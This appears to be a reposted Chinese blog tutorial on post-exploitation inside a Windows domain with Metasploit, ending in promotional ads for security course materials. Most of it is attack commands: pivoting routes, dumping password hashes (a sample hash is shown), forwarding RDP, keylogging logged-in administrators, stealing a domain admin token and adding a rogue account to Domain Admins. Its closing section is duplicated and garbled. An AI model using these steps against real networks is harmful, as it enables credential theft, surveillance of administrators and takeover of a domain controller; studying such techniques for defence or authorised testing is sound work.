MSF 下域内渗透

福利:[ 网络安全重磅福利:入门&进阶全套282G学习资源包免费分享 !]

先获取域内机器session

MSF 下域内渗透_第1张图片

run get_local_subnets //获取本地网络子网掩码

route add 192.168.233.0 255.255.255.0 1 //添加路由表

run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由

run autoroute -s 192.168.2.0/24 //添加动态路由

route print //打印路由表

use auxliary/scanner/portscan/tcp //使用扫描模块对整个 C 段跨网段扫描

use priv //运行注入

run post/windows/gather/hashdump //获取用户名 hash 值

MSF 下域内渗透_第2张图片

Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4

只要是管理员在线或者没有注销。我们可以抓取明文的

kerberos //管理员在线或者没有注销下获取明文

MSF 下域内渗透_第3张图片

3.收集域环境信息+找到域控

利用msf 的端口转发功能来转发一下,然后登入对方的远程桌面看看。

meterpreter > portfwd add -l 2222 -r 127.0.0.1 -p 3389 //反弹 127.0.0.1 端口 3389 到本地 2222 并监听

meterpreter > portfwd

root@kali:~# netstat -an | grep “2222”

root@kali:~# rdesktop 127.0.0.1:2222

MSF 下域内渗透_第4张图片

MSF 下域内渗透_第5张图片

成功登录目标远程桌面。

MSF 下域内渗透_第6张图片

收集域的信息:

3.1.ipconfig /all

找到域控地址192.168.88.130

MSF 下域内渗透_第7张图片

\3. 2.net view

net view /domain //查看自己的有几个域

注:一般 net view 服务器有简单的备注信息如下:

\dns dnsserver

\sqldata sqlserver

\mail exchage

\oa oa server

比如 dns(一般为 DC 域控)

还有要是备注为 servidor master ad

3.3.ip 分析网络结构

接下来一个一个 ping,或者直接写脚本

3.4.用户和组信息

net user

net user /domain – – 可以看到域的所有成员

MSF 下域内渗透_第8张图片

net group “domain admins” /domain —— 查询域管理员用户组

MSF 下域内渗透_第9张图片

我们可以在 net view 的解释可以发现 要是备注为 servidor master ad 那它是域控可能性是很大的

由于 dns 一般就是域控。我们可以通过这个来找域控

还可以 nslookup 来找等等

3.5.搞定域控

1.溢出

ms08_067

要是局域网里面有 xp/2k 的那这个成功率比较高

但是我的域控是 2008

这里也可以用 ms14-068 进行普通域用户提权为域管理员权限

2.DNS 溢出

DNS 服务器可能就是域控 so…

3.弱口令爆破

弱口令+已经控制的服务器口令+

将抓下的明文+一些常用弱口令。组合成字典去。

爆破局域网中存在数据库服务器的主机

由于 2008 默认安全口令策略, 口令强度比较强 ,这个扫描就算吧

4.键盘记录+3389 登入记录

这个记录了 在线管理员的 键盘记录~

可以用 msf 的试试

最后将 msf 的进程转移到 explorer.exe .这样可以正常键盘记录了

不转移可能有一些莫名情况

ps //查看到 exploer.exe 进程为 3804

migrate 3804 //注入进程

keyscan_dump //进行键盘监控

5.假冒令牌

在假冒攻击中 我们将盗取目标系统的一个 Kerberos 令牌,将其用在身份认证中。来假冒当初建立这个令牌的用户。为了能够获取到域管理员的凭证我们需要用域管理员登录一下远程桌面。

MSF 下域内渗透_第10张图片

meterpreter > use incognito //加载会话令牌模块

meterpreter > list_tokens -u //列出会话令牌,需要管理员权限,如果是普通权限需要提权

MSF 下域内渗透_第11张图片

看到 PAYLOAD\administrator 这个域管理员账号,尝试去盗取一下

meterpreter > impersonate_token PAYLOAD\Administrator \盗取 administrator 令牌

注意:PAYLOAD\Administrator中间需要多加一条右划线 \

MSF 下域内渗透_第12张图片

2.add_user admin Qwer1234!@#$ -h 192.168.88.130 有口令安全安全机制 口令复杂些就可以了

3.add_group_user “Domain Admins” admin -h 192.168.88.130 \ 是将其加到域管理员中

MSF 下域内渗透_第13张图片

注意:这里也可以用 mimikatz 直接获取明文,只要域管理员远程桌面登录。

6.嗅探

用 cain.exe 吧 这个嗅探神器 = =,或者msf下的嗅探也可以

\7. ipc$

net use \192.168.88.130\c$ admin@123 /user:payload\administrator

net time \192.168.88.130

MSF 下域内渗透_第14张图片

网络安全成长路线图

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

.csdnimg.cn/569a59c79bb8494292b4efcfed27bf4d.png#pic_center)

# 网络安全学习方法

​ 上面介绍了技术分类和学习路线,这里来谈一下学习方法:
​ ## 视频学习

​ 无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

你可能感兴趣的:(数据库,web安全,网络安全,数据安全,MSF渗透)